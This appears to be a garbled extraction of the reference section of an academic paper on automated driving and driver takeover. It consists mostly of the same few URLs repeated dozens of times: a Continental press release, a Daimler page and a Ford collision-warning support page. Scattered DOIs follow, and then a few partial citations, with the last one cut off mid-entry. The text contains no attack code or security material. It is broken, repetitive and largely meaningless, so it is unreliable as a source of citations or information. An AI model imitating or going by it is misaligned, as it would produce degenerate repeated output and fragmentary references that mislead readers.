https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html https://www.conti-online.com/www/pressportal_com_en/themes/press_releases/1_topics/automated_driving_en/pr_2012_12_18_automated_driving_en.html http://dx.doi.org/10.1016/S0167-6393(00)00078-9 http://dx.doi.org/10.1371/journal.pone.0057410 http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://www.daimler.com/dccom/0-5-1210218-1-1210321-1-0-0-1210228-0-0-135-0-0-0-0-0-0-0-0.html http://dx.doi.org/10.1016/j.aap.2012.12.018 http://dx.doi.org/10.1016/j.trf.2014.06.016 http://dx.doi.org/10.1016/j.promfg.2015.07.514 http://dx.doi.org/10.3141/1628-02 http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://support.ford.com/maintenance/collision-warning-brake-support http://dx.doi.org/10.1007/978-1-4419-8776-1 http://dx.doi.org/10.7717/peerj-cs.13 Gasser T, Westhoff D. 2012. BASt-study: definitions of automation and legal issues in Germany. Presented at the 2012 road vehicle automation workshop, Transportation Research Board. Available at http://onlinepubs.trb.org/onlinepubs/conferences/2012/Automation/presentations/ Gasser.pdf (accessed 13 July 2015). Godinho L, António J, Tadeu A. 2001. 3D sound scattering by rigid barriers in the vicinity of tall buildings. Applied Acoustics 62:1229–1248 DOI 10.1016/S0003-682X(01)00004-4. Gold C, Damböck D, Lorenz L, Bengler K. 2013. “Take over!” How long does it take to get the driver back into the loop? In: Proceedings of the human factors and ergonomics society annual meeting, vol. 57. 1938–1942. Gomes L. 2014. Google self-driving car: it may never actually happen. Available at http://www. slate.com/articles/technology/technology/2014/10/google self driving car it may never actually happen.html (accessed 17 December 